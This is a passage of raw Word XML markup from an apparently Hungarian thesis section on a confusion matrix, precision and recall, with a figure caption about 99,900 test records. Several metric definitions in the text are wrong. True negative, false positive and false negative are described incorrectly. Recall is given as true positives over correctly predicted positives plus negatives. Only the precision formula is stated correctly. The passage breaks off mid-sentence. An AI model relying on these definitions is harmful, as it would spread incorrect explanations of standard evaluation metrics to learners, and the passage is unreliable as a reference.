          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc71471976"/>
      <w:r w:rsidRPr="00AA4C00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Confusion </w:t>
      </w:r>
      <w:r w:rsidR="00C83880">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4C00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>atrix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="75EC078D" w14:textId="5D4214E0" w:rsidR="00554388" w:rsidRDefault="00554388" w:rsidP="00554388">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02517D36" w14:textId="7CF7A712" w:rsidR="002257D7" w:rsidRDefault="00F14934" w:rsidP="00F14934">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19FE3713" wp14:editId="43D1677B">
            <wp:extent cx="3600000" cy="2699896"/>
            <wp:effectExtent l="0" t="0" r="635" b="571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2">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3600000" cy="2699896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7136E533" w14:textId="23765620" w:rsidR="002257D7" w:rsidRDefault="00F14934" w:rsidP="00F14934">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3.1-es ábra: </w:t>
      </w:r>
      <w:r w:rsidR="00507245">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006E0670">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">onfusion </w:t>
      </w:r>
      <w:r w:rsidR="00507245">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00A23AF3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006E0670">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">trix </w:t>
      </w:r>
      <w:r w:rsidR="006E0670" w:rsidRPr="006E0670">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>99.900</w:t>
      </w:r>
      <w:r w:rsidR="006E0670">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tesztadat esetén</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F67192" w14:textId="77777777" w:rsidR="002257D7" w:rsidRDefault="002257D7" w:rsidP="00554388">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="179DC6A8" w14:textId="3974A2B4" w:rsidR="00554388" w:rsidRDefault="00DF2F6A" w:rsidP="003B1D98">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF2F6A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="005C3BFA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="004C633C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>onfusion</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F6A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C3BFA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ma</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF2F6A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>trix olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
      </w:r>
      <w:r w:rsidR="00C76B2C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amelyekből </w:t>
      </w:r>
      <w:r w:rsidR="00C76B2C" w:rsidRPr="002B0BB9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>következtethetünk a</w:t>
      </w:r>
      <w:r w:rsidR="00C76B2C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>dott algoritmus</w:t>
      </w:r>
      <w:r w:rsidR="00C76B2C" w:rsidRPr="002B0BB9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> pontosság</w:t>
      </w:r>
      <w:r w:rsidR="00C76B2C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00C76B2C" w:rsidRPr="002B0BB9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidR="00E124DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B777A75" w14:textId="4D5862F1" w:rsidR="00DF70AC" w:rsidRPr="00DF70AC" w:rsidRDefault="00DF70AC" w:rsidP="00C01D3B">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>igaz pozitív (</w:t>
      </w:r>
      <w:r w:rsidR="0011795F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">true positive, </w:t>
      </w:r>
      <w:r w:rsidR="00571DBC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>TP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>): eredmény, ahol a modell helyesen jósolja meg a pozitív osztályt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7701C" w14:textId="700D2B9C" w:rsidR="00DF70AC" w:rsidRPr="00DF70AC" w:rsidRDefault="00DF70AC" w:rsidP="00C01D3B">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>igaz negatív (</w:t>
      </w:r>
      <w:r w:rsidR="00E50EBF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">true negative, </w:t>
      </w:r>
      <w:r w:rsidR="00571DBC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>TN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">): eredmény, ahol a modell </w:t>
      </w:r>
      <w:r w:rsidR="00B5768D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>helytelenül</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> jósolja meg a </w:t>
      </w:r>
      <w:r w:rsidR="00B5768D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>pozitív</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> osztályt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F58E1" w14:textId="39F46239" w:rsidR="00EC4483" w:rsidRDefault="00ED7A03" w:rsidP="00C01D3B">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hamis pozitív (</w:t>
      </w:r>
      <w:r w:rsidR="00E50EBF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">false positive, </w:t>
      </w:r>
      <w:r w:rsidR="00571DBC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>FP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidR="00BC7CB2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC7CB2" w:rsidRPr="00BC7CB2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">eredmény, ahol a modell helytelenül jósolja meg a </w:t>
      </w:r>
      <w:r w:rsidR="001124D6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>negatív</w:t>
      </w:r>
      <w:r w:rsidR="00BC7CB2" w:rsidRPr="00BC7CB2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> osztályt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A202BCF" w14:textId="3377D005" w:rsidR="000F16C9" w:rsidRDefault="00ED7A03" w:rsidP="00C01D3B">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567" w:hanging="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hamis negatív (</w:t>
      </w:r>
      <w:r w:rsidR="00E50EBF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">false negative, </w:t>
      </w:r>
      <w:r w:rsidR="00571DBC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>FN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidR="0041567D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0041567D" w:rsidRPr="0041567D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">eredmény, ahol a modell </w:t>
      </w:r>
      <w:r w:rsidR="001124D6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>helyese</w:t>
      </w:r>
      <w:r w:rsidR="000A6319">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0041567D" w:rsidRPr="0041567D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> jósolja meg a negatív osztályt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA755E" w14:textId="77777777" w:rsidR="00C15D19" w:rsidRDefault="00C15D19" w:rsidP="0057510A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AD3B95" w14:textId="521B8497" w:rsidR="000B2C77" w:rsidRPr="00C15D19" w:rsidRDefault="00C15D19" w:rsidP="0057510A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Precision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A40349" w14:textId="27660E0E" w:rsidR="00C15D19" w:rsidRDefault="00C15D19" w:rsidP="0057510A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305DBAE9" w14:textId="70886594" w:rsidR="005E39E1" w:rsidRDefault="00CD2964" w:rsidP="002248F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD2964">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00E5465F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Precision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD2964">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C018DD" w:rsidRPr="00C018DD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a helyesen megjósolt pozitív megfigyelések </w:t>
      </w:r>
      <w:r w:rsidR="00B113B3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">(true positive) </w:t>
      </w:r>
      <w:r w:rsidR="00C018DD" w:rsidRPr="00C018DD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és az</w:t>
      </w:r>
      <w:r w:rsidR="00895D16">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> összes</w:t>
      </w:r>
      <w:r w:rsidR="00C018DD" w:rsidRPr="00C018DD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D3D25">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>jósolt pozitív</w:t>
      </w:r>
      <w:r w:rsidR="0090488C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E84563">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>megfigyelések</w:t>
      </w:r>
      <w:r w:rsidR="00B113B3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (total predicted positive)</w:t>
      </w:r>
      <w:r w:rsidR="00B62E27">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, tehát a helyesen és a helytelenül </w:t>
      </w:r>
      <w:r w:rsidR="00B62E27">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">megjósolt </w:t>
      </w:r>
      <w:r w:rsidR="009C792C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>pozitív</w:t>
      </w:r>
      <w:r w:rsidR="00130E9D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> megfigyelések összegének</w:t>
      </w:r>
      <w:r w:rsidR="00CE0AE1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B62E27" w:rsidRPr="00C018DD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>aránya</w:t>
      </w:r>
      <w:r w:rsidR="00B62E27">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005119C8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005119C8" w:rsidRPr="005119C8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="005119C8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Precision</w:t>
      </w:r>
      <w:r w:rsidR="005119C8" w:rsidRPr="005119C8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> akkor hasznos, ha az adatpontok helytelen pozitívként történő osztályozásának költsége nagyon magas</w:t>
      </w:r>
      <w:r w:rsidR="00A42A95">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, például a</w:t>
      </w:r>
      <w:r w:rsidR="00A42A95" w:rsidRPr="00A42A95">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>mikor egy számunkra fontos levelet spamnek minősítenek</w:t>
      </w:r>
      <w:r w:rsidR="00A42A95">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113607BB" w14:textId="3DFD100E" w:rsidR="001F5305" w:rsidRDefault="00CA32EF" w:rsidP="005E39E1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00002C52" w:rsidRPr="00002C52">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>iszámítása a következő képlet segítségével történik:</w:t>
      </w:r>
      <w:r w:rsidR="00AB4B4C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <m:oMath>
        <m:f>
          <m:fPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
            </m:ctrlPr>
          </m:fPr>
          <m:num>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <m:t>TP</m:t>
            </m:r>
          </m:num>
          <m:den>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:lang w:val="hu-HU"/>
              </w:rPr>
              <m:t>TP+FP</m:t>
            </m:r>
          </m:den>
        </m:f>
      </m:oMath>
      <w:r w:rsidR="00AB4B4C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C87BE" w14:textId="77777777" w:rsidR="00C15D19" w:rsidRDefault="00C15D19" w:rsidP="0057510A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643BF612" w14:textId="3A01BBB6" w:rsidR="0057510A" w:rsidRPr="00FE4017" w:rsidRDefault="002179D7" w:rsidP="0057510A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Recall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDF651" w14:textId="77777777" w:rsidR="0057510A" w:rsidRDefault="0057510A" w:rsidP="0057510A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DEB3BD" w14:textId="7E322639" w:rsidR="00F2654E" w:rsidRDefault="002179D7" w:rsidP="001D610C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002179D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00961D5E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Recall</w:t>
      </w:r>
      <w:r w:rsidRPr="002179D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="007624E0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="002179D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">vagy a valódi pozitív ráta - </w:t>
      </w:r>
      <w:r w:rsidR="002248F4" w:rsidRPr="002248F4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a helyesen megjósolt pozitív megfigyelések</w:t>
      </w:r>
      <w:r w:rsidR="00E80686">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (true positive)</w:t>
      </w:r>
      <w:r w:rsidR="002248F4" w:rsidRPr="002248F4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D4744B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és</w:t>
      </w:r>
      <w:r w:rsidR="002248F4" w:rsidRPr="002248F4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00BF5B7E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z összes tényleges pozitív</w:t>
      </w:r>
      <w:r w:rsidR="00CF6D51">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00127062">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">megfigyelések </w:t>
      </w:r>
      <w:r w:rsidR="00CF6D51">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">(total </w:t>
      </w:r>
      <w:r w:rsidR="00085DD6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>actual</w:t>
      </w:r>
      <w:r w:rsidR="00CF6D51">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> positive)</w:t>
      </w:r>
      <w:r w:rsidR="005F1F65">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, tehát a </w:t>
      </w:r>
      <w:r w:rsidR="00B4790C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>helyesen megjósolt pozitív</w:t>
      </w:r>
      <w:r w:rsidR="005D4A64">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és </w:t>
      </w:r>
      <w:r w:rsidR="00B4790C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>negatív</w:t>
      </w:r>
      <w:r w:rsidR="002248F4" w:rsidRPr="002248F4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> megfigyelésé</w:t>
      </w:r>
      <w:r w:rsidR="00D4744B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nek</w:t>
      </w:r>
      <w:r w:rsidR="00127062">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> összegének</w:t>
      </w:r>
      <w:r w:rsidR="00D4744B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> aránya</w:t>
      </w:r>
      <w:r w:rsidRPr="002179D7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E2226D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C61930" w:rsidRPr="00C61930">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00C61930">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Recall</w:t>
      </w:r>
      <w:r w:rsidR="00C61930" w:rsidRPr="00C61930">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> akkor hasznos, ha a rossz osztályozás magas költségekkel jár</w:t>
      </w:r>
      <w:r w:rsidR="00C939B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00396FBE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>például</w:t>
      </w:r>
      <w:r w:rsidR="00C939B6">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
